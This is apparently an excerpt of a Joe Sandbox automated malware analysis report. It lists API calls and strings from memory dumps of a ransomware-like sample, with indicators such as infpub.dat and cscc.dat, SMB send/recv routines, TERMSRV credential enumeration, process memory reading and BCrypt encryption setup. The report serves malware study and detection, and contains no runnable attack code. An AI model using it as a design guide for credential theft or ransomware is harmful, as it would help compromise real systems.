GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,004747E5,?,?,00000000,?,?,?,?,?,?), ref: 0047318E
HeapAlloc.KERNEL32(00000000,?,?,?,004747E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00473195
rand.MSVCRT ref: 004731AF
rand.MSVCRT ref: 004731BD

Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 00472F73
Part of subcall function 00472F5A: HeapAlloc.KERNEL32(00000000), ref: 00472F7C
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,?,76F1C070), ref: 00472F97
Part of subcall function 00472F5A: HeapAlloc.KERNEL32(00000000), ref: 00472F9A
Part of subcall function 00472F5A: htons.WS2_32(424D53FE), ref: 00472FBA
Part of subcall function 00472F5A: memcpy.MSVCRT ref: 0047300B
Part of subcall function 00472F5A: send.WS2_32(?,00000000,?,00000000), ref: 0047301B
Part of subcall function 00472F5A: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00473032
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00473048
Part of subcall function 00472F5A: HeapFree.KERNEL32(00000000), ref: 0047304F
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,?), ref: 0047305A
Part of subcall function 00472F5A: HeapFree.KERNEL32(00000000), ref: 00473061

GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,004747E5,?,?,00000000,?), ref: 004731F4
HeapFree.KERNEL32(00000000), ref: 004731FB

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00479972, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186

APIs

Part of subcall function 004788D3: PathFindFileNameW.SHLWAPI(C:\Windows\infpub.dat), ref: 004788E3

wsprintfW.USER32 ref: 00479AAF
wsprintfW.USER32 ref: 00479B0D

Part of subcall function 00476735: wsprintfW.USER32 ref: 00476758
Part of subcall function 00476735: EnterCriticalSection.KERNEL32(00487B9C,00007FD3,002F16E0,00000028), ref: 00476783
Part of subcall function 00476735: StrCatW.SHLWAPI(?,?), ref: 004767D1
Part of subcall function 00476735: StrCatW.SHLWAPI(?,00483B90), ref: 004767D7
Part of subcall function 00476735: SetLastError.KERNEL32(0000007A), ref: 004767DF
Part of subcall function 00476735: LeaveCriticalSection.KERNEL32(00487B9C), ref: 004767EA

wsprintfW.USER32 ref: 00479B56

Strings

\"C:\Windows\%s\" #1 , xrefs: 00479AEC

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00474B5D, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 305

APIs

GetProcessHeap.KERNEL32(00000008,00000000,757DFE8D,76F2D354,00000000,?,00000000,00000000,00000000), ref: 00474C14
HeapAlloc.KERNEL32(00000000), ref: 00474C1B
rand.MSVCRT ref: 00474CE6

Strings

8, xrefs: 00474C81

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047923F, Relevance: 6.1, APIs: 4, Instructions: 89

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,004779FC,?,?,?), ref: 0047927B
memcpy.MSVCRT ref: 00479294
VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 00479303
VirtualFree.KERNEL32(00000000,?,00004000), ref: 00479323

Part of subcall function 00478F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 00478F52
Part of subcall function 00478F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,002F2308), ref: 00478FB0

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047855F, Relevance: 6.1, APIs: 4, Instructions: 51

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00478571
Process32FirstW.KERNEL32(00000000,?), ref: 0047858F
Process32NextW.KERNEL32(00000000,0000022C), ref: 004785E4
CloseHandle.KERNEL32(00000000), ref: 004785EF

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004776F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84

APIs

CredEnumerateW.ADVAPI32(00000000,00000000,?,?), ref: 0047770B

Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000008,?,76EBE52D,00000000,00000000), ref: 004769E3
Part of subcall function 004769AE: HeapAlloc.KERNEL32(00000000), ref: 004769EC
Part of subcall function 004769AE: memcpy.MSVCRT ref: 00476A19
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000008,?), ref: 00476A3D
Part of subcall function 004769AE: HeapAlloc.KERNEL32(00000000), ref: 00476A40
Part of subcall function 004769AE: memcpy.MSVCRT ref: 00476A6F
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000000,?,002F16E0,?,?), ref: 00476A8F
Part of subcall function 004769AE: HeapFree.KERNEL32(00000000), ref: 00476A92
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000000,?), ref: 00476A99
Part of subcall function 004769AE: HeapFree.KERNEL32(00000000), ref: 00476A9C

CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 004777C3

Strings

TERMSRV/, xrefs: 00477742

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00479332, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27

APIs

gethostbyname.WS2_32(004793FF), ref: 0047933B
wsprintfA.USER32 ref: 00479365

Strings

%u.%u.%u.%u, xrefs: 0047935D

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477E69, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15

APIs

PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat), ref: 00477E7C

Strings

cscc.dat, xrefs: 00477E6D
C:\Windows\, xrefs: 00477E72

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047641A, Relevance: 5.0, APIs: 4, Instructions: 44

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,774E2D57,?,757DC426), ref: 00476439
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00476446
HeapAlloc.KERNEL32(00000000), ref: 0047644D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 00476465

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047682F, Relevance: 5.0, APIs: 4, Instructions: 31

APIs

GetProcessHeap.KERNEL32(00000000), ref: 00476851
HeapFree.KERNEL32(00000000), ref: 00476854
GetProcessHeap.KERNEL32(00000000,?), ref: 00476860
HeapFree.KERNEL32(00000000), ref: 00476863

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476CED, Relevance: 5.0, APIs: 4, Instructions: 31

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000,00000000), ref: 00476CFC
HeapAlloc.KERNEL32(00000000,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000,00000000,00000024,00476AA8), ref: 00476CFF

Part of subcall function 00476D35: EnterCriticalSection.KERNEL32(00000000,757DFE8D,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000), ref: 00476D46
Part of subcall function 00476D35: LeaveCriticalSection.KERNEL32(00000000,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000), ref: 00476D7F
Part of subcall function 00476D35: Sleep.KERNELBASE(00002710,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000), ref: 00476D97

GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000,00000000), ref: 00476D24
HeapFree.KERNEL32(00000000), ref: 00476D27

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Analysis Process: 9706.tmp PID: 3560 Parent PID: 3464

Execution Graph

Execution Coverage:	22.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.8%
Total number of Nodes:	1292
Total number of Limit Nodes:	37

Executed Functions

Function 013025AC, Relevance: 36.9, APIs: 11, Strings: 10, Instructions: 116

APIs

GetModuleHandleW.KERNEL32(kernel32,LoadLibraryW,?), ref: 01302670
GetProcAddress.KERNEL32(00000000), ref: 0130267D
LoadLibraryW.KERNEL32 ref: 0130267F
GetProcAddress.KERNEL32(00000000,BCryptOpenAlgorithmProviderBCryptGenerateSymmetricKey), ref: 01302693
GetProcAddress.KERNEL32(BCryptSetProperty), ref: 013026A5
GetProcAddress.KERNEL32(BCryptGetProperty), ref: 013026B7
GetProcAddress.KERNEL32(BCryptGenerateSymmetricKey), ref: 013026C8
GetProcAddress.KERNEL32(BCryptEncrypt), ref: 013026DA
GetProcAddress.KERNEL32(BCryptDecrypt), ref: 013026EC
GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 013026FE
GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 01302710

Part of subcall function 01302798: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,00000000,?,?,?,01302764), ref: 0130281F
Part of subcall function 01302798: GetProcAddress.KERNEL32(00000000,?,00000000,?,?,?,01302764), ref: 01302828
Part of subcall function 01302798: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,00000000,?,?,?,01302764), ref: 0130289E
Part of subcall function 01302798: GetProcAddress.KERNEL32(00000000,?,00000000,?,?,?,01302764), ref: 013028A1

Strings

ey, xrefs: 0130260F
BCryptOpenAlgorithmProviderBCryptGenerateSymmetricKey, xrefs: 0130268E, 01302691
LoadLibraryW, xrefs: 01302666
BCryptGetProperty, xrefs: 013026A7
BCryptSetProperty, xrefs: 01302695
BCryptEncrypt, xrefs: 013026CA
kernel32, xrefs: 0130266B
BCryptCloseAlgorithmProvider, xrefs: 01302700
BCryptDecrypt, xrefs: 013026DC
BCryptDestroyKey, xrefs: 013026EE

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 0130184E, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42

APIs

NtQuerySystemInformation.NTDLL(00000000,00000000,00000000,00000000), ref: 01301863
GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00001000,?,00000000,0130192A,00000005), ref: 01301880
GetProcAddress.KERNEL32(00000000,?,00000000,0130192A,00000005), ref: 01301887
LocalAlloc.KERNELBASE(?,00000000,0130192A,00000005), ref: 0130188D
NtQuerySystemInformation.NTDLL(?,00000000,00001000,00000000), ref: 0130189D
LocalFree.KERNEL32(?,?,00000000,0130192A,00000005), ref: 013018AB

Strings

LocalAlloc, xrefs: 01301876
kernel32, xrefs: 0130187B

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301D4C, Relevance: 4.6, APIs: 3, Instructions: 60

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,01301C1B), ref: 01301D68
NtQueryInformationProcess.NTDLL(00000000,?,?,00000018,?), ref: 01301D95

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

RtlGetCurrentPeb.NTDLL ref: 01301DCB

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01304D59, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00004D17), ref: 01304D5E

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 0130490D, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,01303B0C,01309D28,00000014), ref: 01304915
GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,01303B0C,01309D28,00000014), ref: 01304937
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,01303B0C,01309D28,00000014), ref: 01304944
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,01303B0C,01309D28,00000014), ref: 01304951
GetProcAddress.KERNEL32(00000000,FlsFree,?,01303B0C,01309D28,00000014), ref: 0130495E
TlsAlloc.KERNEL32(?,01303B0C,01309D28,00000014), ref: 013049AE
TlsSetValue.KERNEL32(00000000,?,01303B0C,01309D28,00000014), ref: 013049C9
EncodePointer.KERNEL32(?,01303B0C,01309D28,00000014), ref: 013049E4
EncodePointer.KERNEL32(?,01303B0C,01309D28,00000014), ref: 013049F1
EncodePointer.KERNEL32(?,01303B0C,01309D28,00000014), ref: 013049FE
EncodePointer.KERNEL32(?,01303B0C,01309D28,00000014), ref: 01304A0B

Part of subcall function 0130602D: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 01306055

DecodePointer.KERNEL32(013047DE,?,01303B0C,01309D28,00000014), ref: 01304A2C

Part of subcall function 01306259: Sleep.KERNEL32(00000000,01303889,?,?,?), ref: 01306281

DecodePointer.KERNEL32(00000000,?,01303B0C,01309D28,00000014), ref: 01304A5B

Part of subcall function 01304697: GetModuleHandleW.KERNEL32(KERNEL32.DLL,01309DA8,00000008,0130479F,00000000,00000000,?,?,013047CC,?,01303806,?,?,01303889,?,?), ref: 013046A8
Part of subcall function 01304697: InterlockedIncrement.KERNEL32(0130B008), ref: 013046E9

GetCurrentThreadId.KERNEL32(?,01303B0C,01309D28,00000014), ref: 01304A6D

Part of subcall function 0130465A: DecodePointer.KERNEL32(00000003,01304A83,?,01303B0C,01309D28,00000014), ref: 0130466B
Part of subcall function 0130465A: TlsFree.KERNEL32(00000007,01304A83,?,01303B0C,01309D28,00000014), ref: 01304685
Part of subcall function 0130465A: DeleteCriticalSection.KERNEL32(00000000,00000000,773EA0FD,?,01304A83,?,01303B0C,01309D28,00000014), ref: 01306094
Part of subcall function 0130465A: DeleteCriticalSection.KERNEL32(00000007,773EA0FD,?,01304A83,?,01303B0C,01309D28,00000014), ref: 013060BE

Strings

FlsSetValue, xrefs: 01304946
FlsGetValue, xrefs: 01304939
FlsAlloc, xrefs: 01304931
KERNEL32.DLL, xrefs: 01304910
FlsFree, xrefs: 01304953

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013033AB, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 156

APIs

Part of subcall function 01301EE7: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 01301F25
Part of subcall function 01301EE7: GetProcAddress.KERNEL32(00000000), ref: 01301F2C

LocalFree.KERNEL32(?), ref: 01303571

Part of subcall function 01301F5A: IsCharAlphaNumericW.USER32(?), ref: 01301F70
Part of subcall function 01301F5A: IsTextUnicode.ADVAPI32(?,?,?), ref: 01301F85

Part of subcall function 013032F6: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000002,?,0130345D), ref: 01303310
Part of subcall function 013032F6: GetProcAddress.KERNEL32(00000000,?,0130345D), ref: 01303317

StrChrW.SHLWAPI(00000000,0000005C), ref: 01303480
wsprintfW.USER32 ref: 013034CB
GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 0130350F
GetProcAddress.KERNEL32(00000000), ref: 01303516
LocalFree.KERNEL32(00000000), ref: 01303523
LocalFree.KERNEL32(00000000), ref: 01303531
LocalFree.KERNEL32(?), ref: 0130353F
LocalFree.KERNEL32(?), ref: 01303551
LocalFree.KERNEL32(?), ref: 01303561

Strings

kernel32, xrefs: 0130350A
%lS%lS%lS:%lS, xrefs: 013034C5
WriteFile, xrefs: 01303505

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301108, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 150

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
GetProcAddress.KERNEL32(00000000), ref: 01301274

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

Strings

LocalAlloc, xrefs: 01301263
ReadFile, xrefs: 0130120A
kernel32, xrefs: 01301184, 01301268
WriteFile, xrefs: 0130117F

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01302AC8, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130

APIs

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000003C,00000000,?,00000000), ref: 01302B39
GetProcAddress.KERNEL32(00000000), ref: 01302B42

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000034), ref: 01302BEA
GetProcAddress.KERNEL32(00000000), ref: 01302BED
LocalFree.KERNEL32(?), ref: 01302C43
LocalFree.KERNEL32(00000000), ref: 01302C4D

Strings

4, xrefs: 01302B1D
KSSM, xrefs: 01302BD0
LocalAlloc, xrefs: 01302B2F, 01302BE0
<, xrefs: 01302B16
kernel32, xrefs: 01302B34, 01302BE5
RUUU, xrefs: 01302BA4

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01302798, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 90

APIs

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,00000000,?,?,?,01302764), ref: 0130281F
GetProcAddress.KERNEL32(00000000,?,00000000,?,?,?,01302764), ref: 01302828
GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,00000000,?,?,?,01302764), ref: 0130289E
GetProcAddress.KERNEL32(00000000,?,00000000,?,?,?,01302764), ref: 013028A1

Strings

ChainingModeCFB, xrefs: 0130284F
AES, xrefs: 01302830
ChainingModeCBC, xrefs: 013027BC
LocalAlloc, xrefs: 01302819, 01302898
ObjectLength, xrefs: 013027E9, 01302879
ChainingMode, xrefs: 013027C1, 01302854
3DES, xrefs: 0130279F
kernel32, xrefs: 01302812, 0130281E, 0130289D

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01302FA7, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 243

APIs

Part of subcall function 01302C5B: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01302D0A
Part of subcall function 01302C5B: OpenProcess.KERNEL32(0130BD30,00000000,?,?,0130CD30,00000000), ref: 01302D35
Part of subcall function 01302C5B: GetCurrentProcess.KERNEL32(?,?,0130CD30,00000000), ref: 01302DDF
Part of subcall function 01302C5B: IsWow64Process.KERNELBASE(00000000,?,0130CD30,00000000), ref: 01302DE6
Part of subcall function 01302C5B: CloseHandle.KERNEL32(?), ref: 01302EDA

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,01309C3C), ref: 013030CC
GetProcAddress.KERNEL32(00000000), ref: 013030D3

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

Part of subcall function 01301EE7: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 01301F25
Part of subcall function 01301EE7: GetProcAddress.KERNEL32(00000000), ref: 01301F2C

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130323B
GetProcAddress.KERNEL32(00000000), ref: 01303242
